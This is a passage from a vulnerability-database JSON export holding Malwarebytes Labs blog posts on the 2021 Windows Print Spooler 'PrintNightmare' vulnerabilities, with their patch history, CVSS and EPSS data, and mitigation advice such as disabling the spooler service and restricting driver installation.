"THREATPOST:EED27183B3F49112A9E785EA56534781"]}, {"type": "trellix", "idList": ["TRELLIX:ED6978182DFD9CD1EA1E539B1EDABE6C"]}]}, "score": {"value": 0.2, "vector": "NONE"}, "backreferences": {"references": [{"type": "attackerkb", "idList": ["AKB:7575B82F-7B7A-4416-B1AA-B8A2DF4D0800", "AKB:9ADF44D2-FA0D-4643-8B97-8B46983B6917", "AKB:CDA9C43E-015D-4B04-89D3-D6CABC5729B9"]}, {"type": "avleonov", "idList": ["AVLEONOV:30285D85FDB40C8D55F6A24D9D446ECF", "AVLEONOV:9D3D76F4CC74C7ABB8000BC6AFB2A2CE"]}, {"type": "cert", "idList": ["VU:131152", "VU:383432"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0465"]}, {"type": "cisa", "idList": ["CISA:367C27124C09604830E0725F5F3123F7", "CISA:4F4185688CEB9B9416A98FE75E7AFE02", "CISA:6C836D217FB0329B2D68AD71789D1BB0"]}, {"type": "cve", "idList": ["CVE-2021-1675", "CVE-2021-34481", "CVE-2021-34527", "CVE-2021-36958"]}, {"type": "githubexploit", "idList": ["0263BC36-BEB1-519B-965B-52D9E6AB116F", "0BB19334-D311-5464-B40B-7B27A0AD8825", "17B904FB-7F3D-54F1-B1B5-069C67184EE5", "1883DF48-6A75-5743-AC93-56292D93A794", "19D705F8-AE98-5DD9-BC4E-CDC0497FB840", "1E42289A-77F8-55A2-B85E-83CAA00CE951", "272E1B9F-32B1-5E4A-A0A9-44AC16DA37DB", "2A12C3BB-2A75-5B33-AE9B-348DB656AC81", "3399B834-8492-5C0C-AA14-7F120BA37AF6", "3D6A6F0D-C38E-5819-A3A7-817A49825CBE", "4A3F2A96-B727-5EF1-B1C1-FE041BA02E28", "4E279194-AC85-5607-A943-AC23EADADEF7", "5AE71695-062E-5DBA-9A16-69BD0C7D1384", "5E52E412-B5BA-54D6-92C1-F70C151A8199", "645DABC8-04DA-51BF-A20F-68F611D2D666", "64AAF745-D50D-575C-B3FF-A09072475502", "7C3B421E-ED99-5C5F-B2BA-4418307C0EBF", "8542D571-7253-5609-BC52-CBCB5F40929A", "895FF449-0383-5007-9352-FABB3E8BD54C", "8EDE916A-F04B-59F0-A88D-13DEF969DC00", "98CA9A39-577D-51F2-B8B9-B20E80D94173", "98CEA984-CF02-58F6-91D5-967F8D36F94A", "9A318669-DAF8-50FF-A5DF-E390E0386254", "9CC224C9-907A-5219-8EFD-A94F15DE0ADD", "A66D9AD7-B29D-5C48-B247-D8ACFCAE9BC7", "AAD37CB5-B2C3-5908-B0D3-052CF47F6D25", "B03B4134-B4C9-5B2D-BA55-EEEA540389F4", "B26A6295-2D2D-508F-B94C-38B6944F8A1F", "B3985759-BBD2-5956-860D-E6361564C262", "B8D9E2C0-202B-5806-88D2-B0E797582618", "BB9DA286-F06B-5A55-B344-1196B32F3C2B", "BDFBDA81-0DEB-5523-B538-F23C3B524986", "C6AE3BFC-9BBB-5327-8845-C88ABB6FEE40", "C841D92F-11E1-5077-AE70-CA2FEF0BC96E", "CD2BFDFF-9EBC-5C8F-83EC-62381CD9BCD5", "D089579B-4420-5AD5-999F-45063D972E66", "D21805C7-F04C-57A9-8A40-84CEEB7695BC", "DF28DCE7-CCFF-5653-81BA-719525BE09AD", "E235B3DF-990F-5508-9496-90462B45125D", "E601A788-C87D-5DD7-98BA-A68C2FEDE978", "E7D3FB75-54DE-5CD8-83D6-438BFC7CFA74", "E82ECEEF-07B8-5340-BAC6-FA5B0E964772", "F1347375-6380-5145-9881-486B76875649", "F1B229EB-2178-53B9-839E-BA0B916376A2", "F1C20A6A-5492-50FE-BB94-25D35B1459EC", "F92F972D-7309-5D0B-BCC2-054883AE83E9", "FBC9D472-5E25-508D-AB6E-B3197FCFED2D", "FF761088-559C-5E71-A5CD-196D4E4571B8", "FFBC2747-5957-57B1-9DD9-AB2BAFCB7BD6"]}, {"type": "hivepro", "idList": ["HIVEPRO:1C413EFAC97AED19F9E35574668008F9", "HIVEPRO:E7E537280075DE5C0B002F1AF44BE1C5"]}, {"type": "kaspersky", "idList": ["KLA12198", "KLA12202", "KLA12213", "KLA12214", "KLA12231", "KLA12246"]}, {"type": "kitploit", "idList": ["KITPLOIT:1358590931647264988"]}, {"type": "krebs", "idList": ["KREBS:3CC49021549439F95A2EDEB2029CF54E", "KREBS:831FD0B726B800B2995A68BA50BD8BE3"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:42218FB85F05643E0B2C2C7D259EFEB5", "MALWAREBYTES:76333D1F0FCAFD79FA2EDD4A4CAFBB38", "MALWAREBYTES:DA59FECA8327C8353EA012EA1B957C7E", "MALWAREBYTES:DB34937B6474073D9444648D34438225"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2021-34527/"]}, {"type": "mscve", "idList": ["MS:CVE-2021-1675", "MS:CVE-2021-34481", "MS:CVE-2021-34527"]}, {"type": "mskb", "idList": ["KB5004945", "KB5005033"]}, {"type": "msrc", "idList": ["MSRC:239E65C8BEB88185329D9990C80B10DF", "MSRC:CB3C49E52425E7C1B0CFB151C6D488A4"]}, {"type": "nessus", "idList": ["SMB_NT_MS21_JUL_5004945.NASL", "SMB_NT_MS21_JUL_5004946.NASL", "SMB_NT_MS21_JUL_5004947.NASL", "SMB_NT_MS21_JUL_5004948.NASL", "SMB_NT_MS21_JUL_5004950.NASL", "SMB_NT_MS21_JUL_5004951.NASL", "SMB_NT_MS21_JUL_5004958.NASL", "SMB_NT_MS21_JUL_5004959.NASL", "SMB_NT_MS21_JUL_5004960.NASL", "SMB_NT_MS21_JUL_CVE-2021-34527_REG_CHECK.NASL", "SMB_NT_MS21_SEP_5005565.NASL", "SMB_NT_MS21_SEP_5005566.NASL", "SMB_NT_MS21_SEP_5005568.NASL", "SMB_NT_MS21_SEP_5005569.NASL", "SMB_NT_MS21_SEP_5005573.NASL", "SMB_NT_MS21_SEP_5005613.NASL", "SMB_NT_MS21_SEP_5005623.NASL", "SMB_NT_MS21_SEP_5005633.NASL"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:12BC089A56EB28CFD168EC09B070733D", "QUALYSBLOG:23EF75126B24C22C999DAD4D7A2E9DF5", "QUALYSBLOG:485C0D608A0A8288FF38D618D185D2A2", "QUALYSBLOG:5576D16DC39617927D8AEFF027CC0911"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:45A121567763FF457DE6E50439C2605A", "RAPID7BLOG:4B35B23167A9D5E016537F6A81E4E9D4", "RAPID7BLOG:5CDF95FB2AC31414FD390E0E0A47E057", "RAPID7BLOG:8DADA7B6B3B1BA6ED3D6EDBA37A79204", "RAPID7BLOG:E44F025D612AC4EA5DF9F2B56FF8680C"]}, {"type": "securelist", "idList": ["SECURELIST:0C07A61E6D92865F5B58728A60866991"]}, {"type": "seebug", "idList": ["SSV:99276"]}, {"type": "talosblog", "idList": ["TALOSBLOG:44F665C3D577FC52EF671E9C0CB1750F", "TALOSBLOG:8CDF0A62E30713225D10811E0E977C1D"]}, {"type": "thn", "idList": ["THN:10A732F6ED612DC7431BDC9A3CEC3A29", "THN:42B8A8C00254E7187FE0F1EF2AF6F5D7", "THN:6428957E9DED493169A2E63839F98667", "THN:9CE630030E0F3E3041E633E498244C8D", "THN:9FD8A70F9C17C3AF089A104965E48C95", "THN:C2D8045AAD8E4BA5A9168782138B6D52", "THN:CAFA6C5C5A34365636215CFD7679FD50", "THN:CF5E93184467C7B8F56A517CE724ABCF", "THN:EDD5C9F076596EB9D13D36268BDBFAD1"]}, {"type": "threatpost", "idList": ["THREATPOST:050A36E6453D4472A2734DA342E95366", "THREATPOST:6D61C560E85ECD0A7A35C55E74849510", "THREATPOST:6F7C157D4D3EB409080D90F02185E728", "THREATPOST:933913B1D9B9CF84D33FECFC77C2FDC8", "THREATPOST:98D815423018872E6E596DAA8131BF3F", "THREATPOST:A8242348917526090B7A1B23735D5C6C", "THREATPOST:EED27183B3F49112A9E785EA56534781"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2021-1675", "epss": "0.968880000", "percentile": "0.994750000", "modified": "2023-03-17"}, {"cve": "CVE-2021-34481", "epss": "0.001190000", "percentile": "0.443290000", "modified": "2023-03-17"}, {"cve": "CVE-2021-34527", "epss": "0.970380000", "percentile": "0.995570000", "modified": "2023-03-17"}, {"cve": "CVE-2021-36958", "epss": "0.003670000", "percentile": "0.681480000", "modified": "2023-03-17"}], "vulnersScore": 0.2}, "_state": {"dependencies": 1678920471, "score": 1684008354, "epss": 1679109163}, "_internal": {"score_hash": "c1a4d154e422fcc1078937b58b97c36c"}}

{"malwarebytes": [{"lastseen": "2021-08-12T12:35:46", "description": "I doubt if there has ever been a more appropriate nickname for a vulnerable service than PrintNightmare. There must be a whole host of people in Redmond having nightmares about the Windows Print Spooler service by now.\n\nPrintNightmare is the name of a set of vulnerabilities that allow a standard user on a Windows network to execute arbitrary code on an affected machine (including domain controllers) as SYSTEM, allowing them to elevate their privileges as far as domain admin. Users trigger the flaw by simply feeding a vulnerable machine a malicious printer driver. The problem was made worse by [confusion](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/07/patch-now-emergency-fix-for-printnightmare-released-by-microsoft/>) around whether PrintNightmare was a known, patched problem or an entirely new problem. In the end it turned out to be a bit of both.\n\n### What happened?\n\nIn June, Microsoft patched a vulnerability in the Windows Print Spooler that was listed as [CVE-2021-1675](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675>). At first it was classified as an elevation of privilege (EoP) vulnerability. Which means that someone with limited access to a system could raise their privilege level, giving them more power over the affected system. This type of vulnerability is serious, especially when it is found in a widely used service like the Windows Print Spooler. A few weeks after the patch Microsoft raised the level of seriousness to a remote code execution (RCE) vulnerability. RCE vulnerabilities allow a malicious actor to execute their code on a different machine on the same network.\n\nIn a rush to be the first to publish a proof-of-concept (PoC), researchers published a write-up and a demo exploit to demonstrate the vulnerability. Only to find out they had alerted the world to a new 0-day vulnerability by accident. This vulnerability listed as [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) was introduced under the name PrintNightmare.\n\nOminously, the researchers behind PrintNightmare predicted that the Print Spooler, which has seen its fair share of problems in the past, would be a fertile ground for further discoveries.\n\nAt the beginning of July, Microsoft issued a set of out-of-band patches to fix this Windows Print Spooler RCE vulnerability. Soon enough, several researchers figured out that local privilege escalation (LPE) still worked. This means that threat actors and already active malware can still exploit the vulnerability to gain SYSTEM privileges. In a demo, [Benjamin Delpy](<https://twitter.com/gentilkiwi>) showed that the update failed to fix vulnerable systems that use certain settings for a feature called Point and Print, which makes it easier for network users to obtain the printer drivers they need.\n\nOn July 13 the Cybersecurity and Infrastructure Security Agency (CISA) issued [Emergency Directive 21-04](<https://cyber.dhs.gov/ed/21-04/>), \u201cMitigate Windows Print Spooler Service Vulnerability\u201d because it became aware of multiple threat actors exploiting PrintNightmare.\n\nAlso in July, [CrowdStrike](<https://www.crowdstrike.com/blog/magniber-ransomware-caught-using-printnightmare-vulnerability/>) identified Magniber ransomware attempting to use a known PrintNightmare vulnerability to compromise victims.\n\n### An end to the nightmare?\n\nIn the August 10 [Patch Tuesday](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/printnightmare-and-rdp-rce-among-major-issues-tackled-by-patch-tuesday/>) update, the Print Spooler service was subject to _yet more_ patching, and Microsoft said that this time its patch should address all publicly documented security problems with the service.\n\nIn an unusual breaking change, one part of the update made admin rights required before using the Windows Point and Print feature.\n\n### Just one day later\n\nOn August 11, Microsoft released information about [CVE-2021-36958](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36958>), yet another 0-day that allows local attackers to gain SYSTEM privileges on a computer. Again, it was security researcher Benjamin Delpy who [demonstrated](<https://vimeo.com/581584478>) the vulnerability, showing that threat actors can still gain SYSTEM privileges simply by connecting to a remote print server.\n\n### Mitigation\n\nThe workaround offered by Microsoft is stopping and disabling the Print Spooler service, although at this point you may be seriously considering a revival of the paperless office idea. So:\n\n * Disable the Print Spooler service on machines that do not need it. Please note that stopping the service without disabling may not be enough.\n * For the systems that do need the Print Spooler service to be running make sure they are not exposed to the Internet.\n\nMicrosoft says it is investigating the vulnerability and working on (yet another) security update.\n\nLike I said [yesterday](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/printnightmare-and-rdp-rce-among-major-issues-tackled-by-patch-tuesday/>): To be continued.\n\nThe post [Microsoft's PrintNightmare continues, shrugs off Patch Tuesday fixes](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/microsofts-printnightmare-continues-shrugs-off-patch-tuesday-fixes/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-12T11:30:26", "type": "malwarebytes", "title": "Microsoft\u2019s PrintNightmare continues, shrugs off Patch Tuesday fixes", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527", "CVE-2021-36958"], "modified": "2021-08-12T11:30:26", "id": "MALWAREBYTES:7F8FC685D6EFDE8FC4909FDA86D496A5", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/microsofts-printnightmare-continues-shrugs-off-patch-tuesday-fixes/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-14T12:38:34", "description": "Last week we wrote about [PrintNightmare](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/07/printnightmare-0-day-can-be-used-to-take-over-windows-domain-controllers/>), a vulnerability that was supposed to be patched but wasn't. After June's Patch Tuesday, researchers found that the patch did not work in every case, most notably on modern domain controllers. Yesterday, Microsoft issued a set of out-of-band patches that sets that aims to set that right by fixing the Windows Print Spooler Remote Code Execution vulnerability listed as [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>).\n\n### Serious problem\n\nFor Microsoft to publish an out-of-band patch a week before July's Patch Tuesday shows just how serious the problem is.\n\nPrintNightmare allows a standard user on a Windows network to execute arbitrary code on an affected machine, and to elevate their privileges as far as domain admin, by feeding a vulnerable machine a malicious printer driver. The problem was exacerbated by confusion around whether PrintNightmare was a known, patched problem or an entirely new problem. In the event it turned out to be a bit of both.\n\nLast week the Cybersecurity and Infrastructure Security Agency (CISA) urged administrators to [disable the Windows Print Spooler service](<https://us-cert.cisa.gov/ncas/current-activity/2021/06/30/printnightmare-critical-windows-print-spooler-vulnerability>) in domain controllers and systems that don't print.\n\nHowever, the installation of the Domain Controller (DC) role adds a thread to the spooler service that is responsible for removing stale print queue objects. If the spooler service is not running on at least one domain controller in each site, then Active Directory has no means to remove old queues that no longer exist.\n\nSo, many organizations were forced to keep the Print Spooler service enabled on some domain controllers, leaving them at risk to attacks using this vulnerability.\n\n### Set of patches\n\nDepending on the Windows version the patch will be offered as:\n\n * [KB5004945](<https://support.microsoft.com/en-us/topic/july-6-2021-kb5004947-os-build-17763-2029-out-of-band-71994811-ff08-4abe-8986-8bd3a4201c5d>) for Windows 10 version 2004, version 20H1, and version 21H1\n * [KB5004946](<https://support.microsoft.com/en-us/topic/july-6-2021-kb5004946-os-build-18363-1646-out-of-band-18c5ffac-6015-4b3a-ba53-a73c3d3ed505>) for Windows 10 version 1909\n * [KB5004947](<https://support.microsoft.com/en-us/topic/july-6-2021-kb5004947-os-build-17763-2029-out-of-band-71994811-ff08-4abe-8986-8bd3a4201c5d>) for Windows 10 version 1809 and Windows Server 2019\n * KB5004949 for Windows 10 version 1803 which is not available yet\n * [KB5004950](<https://support.microsoft.com/en-us/topic/july-6-2021-kb5004950-os-build-10240-18969-out-of-band-7f900b36-b3cb-4f5e-8eca-107cc0d91c50>) for Windows 10 version 1507\n * Older Windows versions (Windows 7 SP1, Windows 8.1 Server 2008 SP2, Windows Server 2008 R2 SP1, and Windows Server 2012 R2) will receive a security update that disallows users who are not administrators to install only signed print drivers to a print server.\n\nSecurity updates have not yet been released for Windows 10 version 1607, Windows Server 2016, or Windows Server 2012, but they will also be released soon, according to Microsoft.\n\nThe updates are cumulative and contain all previous fixes as well as protections for [CVE-2021-1675](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1675>).\n\n### Not a complete fix\n\nIt is important to note that these patches and updates **only tackle the remote code execution (RCE) part** of the vulnerability. Several researchers have confirmed that the local privilege escalation (LPE) vector still works. This means that threat actors and already active malware can still locally exploit the vulnerability to gain SYSTEM privileges.\n\n### Advice\n\nMicrosoft recommends that you install this update immediately on all supported Windows client and server operating systems, starting with devices that currently host the print server role. You also have the option to configure the `RestrictDriverInstallationToAdministrators` registry setting to prevent non-administrators from installing signed printer drivers on a print server. See [KB5005010](<https://support.microsoft.com/en-us/topic/kb5005010-restricting-installation-of-new-printer-drivers-after-applying-the-july-6-2021-updates-31b91c02-05bc-4ada-a7ea-183b129578a7>) for more details.\n\n> \u201cThe attack vector and protections in CVE-2021-34527 reside in the code path that installs a printer driver to a Server. The workflow used to install a printer driver from a trusted print server on a client computer uses a different path. In summary, protections in CVE-2021-34527 including the RestrictDriverInstallationToAdministrators registry key do not impact this scenario.\u201d\n\nCISA encourages users and administrators to review the Microsoft Security Updates as well as CERT/CC Vulnerability Note [VU #383432](<https://www.kb.cert.org/vuls/id/383432>) and apply the necessary updates or workarounds.\n\n### Impact of the updates\n\nSo, the vulnerability lies in the normal procedure that allows users to install a printer driver on a server. A printer driver is in essence an executable like any other. And allowing users to install an executable of their choice is asking for problems. Especially combined with a privilege escalation vulnerability that anyone can use to act with SYSTEM privileges. The updates, patches, and some of the workarounds are all designed to limit the possible executables since they need to be signed printer drivers.\n\nFor a detailed and insightful diagram that shows GPO settings and registry keys administrators can check whether their systems are vulnerable, have a look at this flow chart diagram, courtesy of [Will Dormann](<https://twitter.com/wdormann>).\n\n> This is my current understanding of the [#PrintNightmare](<https://twitter.com/hashtag/PrintNightmare?src=hash&ref_src=twsrc%5Etfw>) exploitability flowchart. \nThere's a small disagreement between me and MSRC at the moment about UpdatePromptSettings vs. NoWarningNoElevationOnUpdate, but I think it doesn't matter much as I just have both for now. [pic.twitter.com/huIghjwTFq](<https://t.co/huIghjwTFq>)\n> \n> -- Will Dormann (@wdormann) [July 7, 2021](<https://twitter.com/wdormann/status/1412906574998392840?ref_src=twsrc%5Etfw>)\n\n### Information for users that applied 0patch\n\nIt is worth mentioning for the users that applied the PrintNightmare [micropatches by 0patch](<https://blog.0patch.com/2021/07/free-micropatches-for-printnightmare.html>) that according to 0patch it is better not to install the Microsoft patches. They posted on Twitter that the Microsoft patches that only fix the RCE part of the vulnerability disable the 0patch micropatch which fixes both the LPE and RCE parts of the vulnerability.\n\n> If you're using 0patch against PrintNightmare, DO NOT apply the July 6 Windows Update! Not only does it not fix the local attack vector but it also doesn't fix the remote vector. However, it changes localspl.dll, which makes our patches that DO fix the problem stop applying. <https://t.co/osoaxDVCoB>\n> \n> -- 0patch (@0patch) [July 7, 2021](<https://twitter.com/0patch/status/1412826130051174402?ref_src=twsrc%5Etfw>)\n\n### Update July 9, 2021\n\nOnly a little more than 12 hours after the release a researcher has found an exploit that works on a patched system under special circumstances. [Benjamin Delpy](<https://twitter.com/gentilkiwi?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1412771368534528001%7Ctwgr%5E%7Ctwcon%5Es1_&ref_url=https%3A%2F%2Farstechnica.com%2Fgadgets%2F2021%2F07%2Fmicrosofts-emergency-patch-fails-to-fix-critical-printnightmare-vulnerability%2F>) showed an exploit working against a Windows Server 2019 that had installed the out-of-band patch. In a demo Delpy shows that the update fails to fix vulnerable systems that use certain settings for a feature called [point and print](<https://docs.microsoft.com/en-us/windows-hardware/drivers/print/introduction-to-point-and-print>), which makes it easier for network users to obtain the printer drivers they need.\n\nIn Microsoft's defense the advisory for [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) contains a note in the FAQ stating that:\n\n> Point and Print is not directly related to this vulnerability, but certain configurations make systems vulnerable to exploitation.\n\n### Update July 14, 2021\n\nThe Cybersecurity and Infrastructure Security Agency\u2019s (CISA) has issued [Emergency Directive 21-04](<https://cyber.dhs.gov/ed/21-04/>), \u201cMitigate Windows Print Spooler Service Vulnerability\u201d because it is aware of active exploitation, by multiple threat actors, of the PrintNightmare vulnerability. \n\nCISA has determined that this vulnerability poses an unacceptable risk to Federal Civilian Executive Branch agencies and requires emergency action. The actions CISA lists are required actions for the agencies. The determination that these actions are necessary is based on the current exploitation of this vulnerability by threat actors in the wild, the likelihood of further exploitation of the vulnerability, the prevalence of the affected software in the federal enterprise, and the high potential for a compromise of agency information systems. Exploitation of the vulnerability allows an attacker to remotely execute code with system level privileges enabling a threat actor to quickly compromise the entire identity infrastructure of a targeted organization. \n\nThe post [UPDATED: Patch now! Emergency fix for PrintNightmare released by Microsoft](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/07/patch-now-emergency-fix-for-printnightmare-released-by-microsoft/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-07T14:17:31", "type": "malwarebytes", "title": "UPDATED: Patch now! Emergency fix for PrintNightmare released by Microsoft", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-07-07T14:17:31", "id": "MALWAREBYTES:DB34937B6474073D9444648D34438225", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/07/patch-now-emergency-fix-for-printnightmare-released-by-microsoft/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-08T08:32:20", "description": "In a rush to be the first to publish a proof-of-concept (PoC), researchers have published a write-up and a demo exploit to demonstrate a vulnerability that has been dubbed PrintNightmare. Only to find out they had alerted the world to a new 0-day vulnerability by accident.\n\n### What happened?\n\nIn June, Microsoft patched a vulnerability in the Windows Print Spooler that was listed as [CVE-2021-1675](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675>). At first it was classified as an elevation of privilege (EoP) vulnerability. Which means that someone with limited access to a system could raise their privilege level, giving them more power over the affected system. This type of vulnerability is serious, especially when it is found in a widely used service like the Windows Print Spooler. A few weeks after the patch Microsoft raised the level of seriousness to a remote code execution (RCE) vulnerability. RCE vulnerabilities allow a malicious actor to execute their code on a different machine on the same network.\n\nAs per [usual](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/06/microsoft-fixes-seven-zero-days-including-two-puzzlemaker-targets-google-fixes-serious-android-flaw/>), the general advice was to install the patches from Microsoft and you\u2019re done. Fast forward another week and a researcher announced he'd found a way to exploit the vulnerability to achieve both local privilege escalation and remote code execution. This actually happens a lot when researchers reverse engineer a patch.\n\nOnly in this case it had an unexpected consequence. A different team of researchers had also found an RCE vulnerability in the Print Spooler service. They called theirs PrintNightmare and believed it was the same as CVE-2021-1675. They were working on a presentation to be held at the Black Hat security conference. But now they feared that the other team had stumbled over the same vulnerability, so they published their work, believing it was covered by the patch already released by Microsoft.\n\nBut the patch for CVE-2021-1675 didn't seem to work against the PrintNightmare vulnerability. It appeared that PrintNightmare and CVE-2021-1675 were in fact two very similar but different vulnerabilities in the Print Spooler.\n\nAnd with that, it looked as if the PrintNightmare team had, unwittingly, disclosed a new 0-day vulnerability irresponsibly. (Disclosure of vulnerabilities is considered responsible if a vendor is given enough time to issue a patch.)\n\nSince then, some security researchers have argued that CVE-2021-1675 and PrintNightmare are the same, and others have reported that the CVE-2021-1675 patch works on _some_ systems.\n\n> [#PrintNightmare](<https://twitter.com/hashtag/PrintNightmare?src=hash&ref_src=twsrc%5Etfw>) / CVE-2021-1675 - It appears patches might be effective on systems that are not domain controllers. RpcAddPrinterDriverEx call as non-admin fails with access denied against fully patched Server 2016 and 2019 non-DC, but after dcpromo the exploit works again. \n![\ud83e\udd37](https://s.w.org/images/core/emoji/13.0.1/72x72/1f937.png) [pic.twitter.com/USetUXUzXN](<https://t.co/USetUXUzXN>)\n> \n> -- Stan Hegt (@StanHacked) [July 1, 2021](<https://twitter.com/StanHacked/status/1410405688766042115?ref_src=twsrc%5Etfw>)\n\nWhether they are the same or not, what is not in doubt is that there are live Windows systems where PrintNightmare cannot be patched. And unfortunately, it seems that the systems where the patch doesn't work are Windows Domain Controllers, which is very much the worst case scenario. \n\n### PrintNightmare\n\nThe Print Spooler service is embedded in the Windows operating system and manages the printing process. It is running by default on most Windows machines, including Active Directory servers.\n\nIt handles preliminary functions of finding and loading the print driver, creating print jobs, and then ultimately printing. This service has been around \u201cforever\u201d and it has been a fruitful hunting ground for vulnerabilities, with many flaws being found and fixed over the years. Remember [Stuxnet](<https://blog.malwarebytes.com/threat-analysis/2013/11/stuxnet-new-light-through-old-windows/>)? Stuxnet also exploited a vulnerability in the Print Spooler service as part of the set of vulnerabilities the worm used to spread.\n\nPrintNightmare can be triggered by an unprivileged user attempting to load a malicious driver remotely. Using the vulnerability, researchers have been able to gain SYSTEM privileges, and achieved remote code execution with the highest privileges on a fully patched system.\n\nTo exploit the flaw, attackers would first have to gain access to a network with a vulnerable machine. Although this provides some measure of protection, it is worth noting that there are underground markets where criminals can purchase this kind of access for a few dollars.\n\nIf they can secure any kind of access, they can potentially use PrintNightmare to turn a normal user into an all-powerful Domain Admin. As a Domain Admin they could then act almost with impunity, spreading ransomware, deleting backups and even disabling security software.\n\n### Mitigation\n\nConsidering the large number of machines that may be vulnerable to PrintNightmare, and that several methods to exploit the vulnerability have been published, it seems likely there will soon be malicious use-cases for this vulnerability.\n\nThere are a few things you can do until the vulnerability is patched. Microsoft will probably try to patch the vulnerability before next patch Tuesday (July 12), but until then you can:\n\n * Disable the Print Spooler service on machines that do not need it. Please note that stopping the service without disabling may not be enough.\n * For the systems that do need the Print Spooler service to be running make sure they are not exposed to the internet.\n\nI realize the above will not be easy or even feasible in every case. For those machines that need the Print Spooler service and also need to be accessible from outside the LAN, very carefully limit and [monitor](<https://support.malwarebytes.com/hc/en-us/articles/360056829274-Configure-Brute-Force-Protection-in-Malwarebytes-Nebula>) access events and permissions. Also at all costs avoid running the Print Spooler service on any domain controllers.\n\nFor further measures it is good to know that the exploit works by dropping a DLL in a subdirectory under C:\\Windows\\System32\\spool\\drivers, so system administrators can create a \u201cDeny to modify\u201d rule for that directory and its subdirectories so that even the SYSTEM account can not place a new DLL in them.\n\nThis remains a developing situation and we will update this article if more information becomes available.\n\n### Update July 2, 2021\n\nMicrosoft acknowledged this vulnerability and it has been assigned [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>). In their description Microsoft also provides an extra workaround besides disabling the Print Spooler service.\n\n**Disable inbound remote printing through Group Policy**\n\nYou can also configure the settings via Group Policy as follows:\n\n * Computer Configuration / Administrative Templates / Printers\n * Disable the \u201cAllow Print Spooler to accept client connections:\u201d policy to block remote attacks.\n\n**Impact of workaround** This policy will block the remote attack vector by preventing inbound remote printing operations. The system will no longer function as a print server, but local printing to a directly attached device will still be possible.\n\nThe post [PrintNightmare 0-day can be used to take over Windows domain controllers](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/07/printnightmare-0-day-can-be-used-to-take-over-windows-domain-controllers/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": 